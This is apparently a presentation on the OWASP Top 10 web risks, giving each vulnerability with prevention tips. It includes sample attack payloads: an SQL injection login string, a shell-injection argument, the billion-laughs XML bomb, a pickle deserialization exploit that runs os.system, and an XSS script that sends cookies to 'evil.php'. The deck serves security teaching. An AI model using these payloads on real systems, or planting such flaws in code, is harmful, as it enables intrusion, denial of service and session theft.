OWASP Top 10

Piotr Gawryś

What's OWASP?

Open Web Application Security Project

  • Application security tools and standards
  • Learning resources
  • Standard security controls and libraries
  • Conferences
  • non-profit, open to use and contribute

 

https://www.owasp.org

OWASP Top 10

 

  • List of common vulnerabilities
  • Application security standard
  • Provides basic techniques to protect against high risk problem areas
  • Education and raising awarness
  • Should be considered a starting point

 

https://www.owasp.org/index.php/top10

How ranking is created?

 

  • Based on community feedback and data assembled from dozens of organizations ( gathered from over 100 000 real-world applications and APIs)
  • Top 10 items are selected and prioritized according to this data, in combination with other factors such as explotability, detectability, and impact
  • Previous editions: 2010, 2013

 

 

Injection

 

  • Malicious code is sent through web application to another sub-system as part of a command or query
  • The attacker tricks the interpreter into executing unintended commands or accessing data without proper authorization

SQL Injection

login:

password:

user' OR 1=1 #

SELECT data, login, password 
WHERE login = '$login' AND password = '$password';


SELECT data, login, password 
WHERE login = 'user' OR 1=1 # AND password = '';

OS Injection

public class DoStuff {
  // Imagine that the attacker would pass e.g. "userName ; cat /etc/host"
  public string executeCommand(String userName){
    try {
      Runtime rt = Runtime.getRuntime();
      // Call exe with userName
      rt.exec("doStuff.exe " + "-" + userName); 
    } catch(Exception e) { 
        e.printStackTrace();
      }
   }
}

Injection Prevention

 

  • Keep data separated from commands and queries
  • Input validation
  • Escape special characters
  • Use LIMIT in SQL queries to at least minimize the disaster
  • Don't write SQL queries directly

Broken Authentication

 

  • Logging into someone else's account
  • Can compromise entire system with just one success attempt

Broken Authentication Prevention

 

  • Multi-Factor Authentication
  • Don't use any default credentials
  • Weak-password checks
  • Use the same message for failed login attempts
  • Use Server-Side sessions that are securely stored and invalidated
  • Rate limiting

Sensitive Data Exposure

 

  • The attacker gets access to sensitive data using means such as man-in-the-middle attacks, stealing data in transit or the browser

Sensitive Data Exposure Examples

 

  • An application encrypts credit card numbers in a database using automatic database encryption which is automatically decrypted when retrieved. Allows to retrieve credit card numbers in clear text with SQL Injection
  • Man in the Middle Attack - the attacker acts as a proxy between the user and web application, intercepting the data

Sensitive Data Exposure Prevention

 

  • Encrypt all sensitive data at rest
  • Encrypt all data in transit with secure protocols
  • Don't store sensitive data unnecessarily
  • Use up-to-date and strong standard algorithms, protocols
  • Store passwords using strong and salted hashing functions
  • Disable caching for responses that contain sensitive data

XML External Entities (XXE)

 

  • Attack against a web application that parses XML input
  • Exploiting vulnerable XML processors by including hostile content there
  • Flaws can be used to extract data, execute a remote request from the serever and more

Billion Laughs Attack

<?xml version="1.0"?>
<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ELEMENT lolz (#PCDATA)>
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
 <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
 <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
 <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
 <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
 <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
 <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

Expands to 1 billion lols (~3 GB of memory)!

XML External Entities (XXE) Prevention

 

  • Use less complex data formats such as JSON, whenever possible
  • Avoid serialization of sensitive data
  • Disable the use of external entities in an XML application
  • Use latest version of XML processors and libraries
  • XML input data validation
  • Use tools such as SAST which can help detecting the issue

Broken Access Control

 

  • Incorrectly implemented access control
  • Hard to detect automatically
  • Attacker can act as a user or administrator, using privileged functions

Broken Access Control Example

Website identifies admin resources with url, e.g.

http://example.com/app/getappinfo

http://example.com/app/admin_getappinfo

Broken Access Control Prevention

 

  • Deny by default
  • Implement once and re-use throughout the application
  • Model access controls should enforce record ownership, rather than accepting that the user can create, read, update, or delete any record
  • Invalidate tokens after logout
  • Write functional access control tests
  • Log access control failures, alert admins when appropriate (e.g. repeated failures)

Security Misconfiguration

 

  • Result of using default, incomplete or ad hoc configurations, excessively verbose errors, enabling unnecessary features (e.g. open ports, accounts)
  • Can happen at any level of an application stack
  • Attacker can get unauthorized access to some parts of the system

Security Misconfiguration Example

 

  • Directory listing is not disabled on the server - an attacker can list and download compiled Java classes
  • Server returns detailed error messages, e.g. stack traces

Security Misconfiguration Prevention

 

  • Design repeatable, hardening process that makes it fast and easy to deploy another environment that is secure. Dev, QA, Prod environments should have the same configuration, with different credentials.
  • Remove or do not install unused features
  • Review and update the configurations appropariate to all security process, like cloud storage permissions
  • Send security directives to clients

Cross-Site Scripting (XSS)

 

  • Occurs when web application allow users to add custom code into a url path or onto a website that will be seen by other users. It can run malicious JavaScript code on a victim's browser
  • Found in around 2/3 of all applications
  • The attacker can steal credentials, sessions, or deliver malware to the victim

Cross-Site Scripting (XSS) Example

<SCRIPT type="text/javascript">
var adr = '../evil.php?cakemonster=' + escape(document.cookie);
</SCRIPT>

Embedding script in URL:

Cross-Site Scripting (XSS) Prevention

 

  • Use framework that automatically escape XSS by design
  • Escape untrusted HTTP request data
  • Enable Content Security Policy (CSP)

Insecure Deserialization

  • Exploiting deserialization mechanisms
  • Can lead to remote code execution attacks

Insecure Deserialization Example

import os
import _pickle

# Attacker prepares exploit that application will insecurely deserialize
class Exploit(object):
  def __reduce__(self):
    return (os.system, ('whoami',))

# Attacker serializes the exploit
def serialize_exploit():
  shellcode = _pickle.dumps(Exploit())
  return shellcode

# Application insecurely deserializes the attacker's serialized data
def insecure_deserialization(exploit_code):
  _pickle.loads(exploit_code)

if __name__ == '__main__':
  # Serialize the exploit
  shellcode = serialize_exploit()

  # Attacker's payload runs a `whoami` command
  insecure_deserialization(shellcode)

Insecure Deserialization Prevention

 

  • Do not accept serialized objects from untrusted sources, or...
  • Integrity checks, such as digital signatures on any serialized objects
  • Enforce strict type constraint during deserialization
  • Run deserialization code in low privilege environments when possible
  • Log deserialization failures
  • Restrict or monitor incoming and outgoing network connectivity from containers/servers that deserialize

Using Components with Known Vulnerabilities

 

  • Security holes in popular components can leave tons of sites vulnerable to exploit
  • These components run with the same privileges as the rest of the application
  • Developers often don't even understand which components they use or how they work

Using Components with Known Vulnerabilities Prevention

 

  • Remove unused dependencies
  • Make sure your dependencies are up to date
  • Subscribe to email alerts for security vulnerabilities related to components you use
  • Only obtain dependencies from official sources over secure links, preferably signed

Insufficient Logging & Monitoring

 

  • Attackers can rely on the lack of monitoring and timely response to achieve their goals without being detected
  • In 2016, identifying a breach took an average of 191 days

Insufficient Logging & Monitoring Examples

 

  • Not detecting scanning for accounts using the same password
  • The attackers probed for vulnerabilities but launched full attack later which wasn't detected

Insufficient Logging & Monitoring Prevention

 

  • Ensure all login, access control failures, and server-side input validation failures can be logged with sufficient user context to identify suspicious or malicious accounts
  • Ensure that logs are generated in a format that can be easily consumed by a centralized log management solutions
  • Ensure high-value transactions have an audit trail with integrity controls to prevent tampering or deletion
  • Establish effective monitoring and alerting such that suspicious activities are detected and responded to in a timely fashion

What about other vulnerabilities?

 

  • The Top 10 covers a lot of ground, but they are way more important security risk, such as: Cross-Site Request Forgery, Uncontrolled Resource Consumption, Server-Side Request Forgery, ...
  • The document with OWASP Top 10 contains additional instruction and links with next steps

owasp-top-10

By Piotr Gawryś

owasp-top-10

  • 111
Loading comments...

More from Piotr Gawryś